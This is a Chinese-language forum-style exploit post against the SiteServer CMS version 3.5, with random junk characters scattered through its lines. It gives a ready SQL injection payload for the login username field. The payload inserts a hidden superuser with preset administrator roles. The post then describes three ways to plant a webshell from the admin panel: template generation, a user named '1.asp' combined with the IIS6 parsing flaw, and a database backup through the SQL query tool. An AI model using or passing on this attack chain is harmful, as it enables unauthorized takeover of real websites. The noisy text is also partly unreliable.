经测试秒杀最新的3.5版3 d2 ^" |% u" ~- Y3 G) M Y
stieserver官网:www.siteserver.cn" o9 z" ~" n3 I y9 u" B1 T+ W
EXP:
9 y3 h. G) U+ ^( s P直接访问UserCenter/login.aspx" {4 G7 _: R3 b, b3 n
用户名处输入:7 z& A4 u( O- k* S( l# S7 j- H
4 ]! [$ C2 L$ ?/ p$ K
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
: W+ J! I5 b; H% ?* X5 l密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
+ A6 `3 K3 ]0 k& J9 q/ |/ _! \之后再访问后台SiteServer/login.aspx用插入的用户登陆
: H2 k7 g) I$ v/ \) k后台拿webshell的三种方法:
$ c& A- U( j# F0 `3 f一、, k$ C- _9 F# Y# ~& A, n$ v8 S
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx* L# C8 M$ x8 a X
二、
6 e3 m+ K8 F9 ~9 s. s成员权限-》添加用户-》用户名为:1.asp
9 ~3 W/ u7 i# D) g& f( ~http://127.0.0.1/usercenter/
1 Y: R+ g$ H+ n# }& U t( I用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
! }( _$ F" R9 j$ B' r(ps:后台添加用户时不会验证是否含有非法字符) Z3 |+ ^9 @& j- |! e4 L$ z" {
三、* V2 y% i! N9 O1 ]) y- `
系统工具-》实用工具-》机器参数查看
1 q( E9 ]. D8 M6 v! E8 X e3 K可以看到数据库类型、名称,WEB路径/ L! q% v* u% g$ Q4 p$ _3 r
系统工具-》数据库工具-》SQL语句查询5 l+ c; n7 w. c
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |